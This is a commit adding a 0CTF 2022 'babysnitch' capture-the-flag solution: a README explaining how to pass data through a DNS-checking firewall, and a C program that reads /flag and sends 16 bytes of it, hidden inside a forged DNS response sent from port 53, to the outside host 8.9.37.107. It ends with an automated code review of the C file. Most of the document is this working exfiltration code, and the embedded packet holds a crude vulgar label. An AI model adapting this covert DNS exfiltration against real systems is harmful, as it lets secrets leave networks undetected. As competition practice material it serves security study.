
Commit bea3f44

committed
Add 0ctf babysnitch
1 parent 20b5d50 commit bea3f44


2 files changed

+95
-0
lines changed

Lines changed: 9 additions & 0 deletions
@@ -0,0 +1,9 @@
1+
BabySnitch
2+
----------
3+
4+
5+
As docker allows us to bind to privileged ports, we can send a UDP request with srcport 53 and dstport 53 to exfil the flag.
6+
7+
The firewall checks to make sure it's a valid DNS response, so we need to ensure the packet is a valid format and smuggle the flag inside.
8+
9+
Check `solve.c` for the solution.

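--- a/2022/0ctf-2022/babysnitch/solve.c
+++ b/2022/0ctf-2022/babysnitch/solve.c
@@ -0,0 +1,86 @@
+#include <arpa/inet.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+int main()
+{
+FILE *f = NULL;
+
+if ((f = fopen("/flag", "rb")) == NULL) {
+printf("File read error\n");
+return -1;
+}
+
+fseek(f, 0, SEEK_END);
+long fsize = ftell(f);
+fseek(f, 0, SEEK_SET); /* same as rewind(f); */
+
+char *flag = NULL;
+if ((flag = malloc(fsize + 1)) == NULL) {
+printf("malloc error\n");
+return -1;
+}
+fread(flag, fsize, 1, f);
+fclose(f);
+
+flag[fsize] = 0;
+
+int sock = 0;
+if ((sock = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
+printf("Socket creation error\n");
+return -1;
+}
+
+struct sockaddr_in serv_addr, srcaddr;
+serv_addr.sin_family = AF_INET;
+serv_addr.sin_port = htons(53);
+
+if (inet_pton(AF_INET, "8.9.37.107", &serv_addr.sin_addr) <= 0) {
+printf("Address error\n");
+return -1;
+}
+
+memset(&srcaddr, 0, sizeof(srcaddr));
+srcaddr.sin_family = AF_INET;
+srcaddr.sin_addr.s_addr = htonl(INADDR_ANY);
+srcaddr.sin_port = htons(53);
+
+if (bind(sock, (struct sockaddr *) &srcaddr, sizeof(srcaddr)) < 0) {
+perror("bind");
+exit(1);
+}
+
+unsigned char req[] = { /* Packet 84243 */
+0xc3, 0xf1, 0x81, 0x83, 0x00, 0x01, 0x00, 0x00,
+0x00, 0x01, 0x00, 0x01, 0x25, 0x70, 0x65, 0x72,
+0x66, 0x65, 0x63, 0x74, 0x70, 0x61, 0x64, 0x64,
+0x6c, 0x65, 0x72, 0x6c, 0x6d, 0x61, 0x6f, 0x70,
+0x65, 0x70, 0x65, 0x67, 0x61, 0x6f, 0x6d, 0x67,
+0x73, 0x75, 0x63, 0x6b, 0x6d, 0x79, 0x64, 0x69,
+0x63, 0x6b, 0x04, 0x62, 0x6c, 0x75, 0x65, 0x00,
+0x00, 0x01, 0x00, 0x01, 0xc0, 0x32, 0x00, 0x06,
+0x00, 0x01, 0x00, 0x00, 0x07, 0x08, 0x00, 0x36,
+0x02, 0x61, 0x30, 0x03, 0x6e, 0x69, 0x63, 0xc0,
+0x32, 0x0a, 0x68, 0x6f, 0x73, 0x74, 0x6d, 0x61,
+0x73, 0x74, 0x65, 0x72, 0x06, 0x64, 0x6f, 0x6e,
+0x75, 0x74, 0x73, 0x05, 0x65, 0x6d, 0x61, 0x69,
+0x6c, 0x00, 0x63, 0x26, 0xb7, 0x93, 0x00, 0x00,
+0x1c, 0x20, 0x00, 0x00, 0x03, 0x84, 0x00, 0x12,
+0x75, 0x00, 0x00, 0x00, 0x0e, 0x10, 0x00, 0x00,
+0x29, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+0x00 };
+
+
+memcpy(&req[0x10], &flag[0x60], 0x10);
+
+
+sendto(sock, req, sizeof(req), MSG_CONFIRM, (const struct sockaddr *) &serv_addr, sizeof(serv_addr));
+
+printf("BYE\n");
+
+return 0;
+}
+
+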
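Review bot: `memcpy(&req[0x10], &flag[0x60], 0x10);` reads 16 bytes starting at offset 0x60 of a heap buffer that is only `fsize + 1` bytes long, and nothing before it checks `fsize`, so a `/flag` shorter than 0x70 bytes turns this into an out-of-bounds read; a guard such as `if (fsize < 0x70) { fprintf(stderr, "flag too short\n"); return -1; }` ahead of the copy closes that. The same size comes from an unchecked `ftell` (which returns -1 on failure) and the `fread` result is discarded, so a short or failed read would go unnoticed. `serv_addr` is filled field by field without the `memset` that `srcaddr` gets, leaving `sin_zero` uninitialized; `memset(&serv_addr, 0, sizeof(serv_addr));` before the `sin_family` assignment matches the other struct. The return value of `sendto` is also ignored, so "BYE" prints even when nothing left the host. A short comment on `req` noting that it is a captured DNS response (flags `0x81 0x83`) and that bytes 0x10–0x1f sit inside the 37-byte first question label would make the two magic offsets reviewable.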
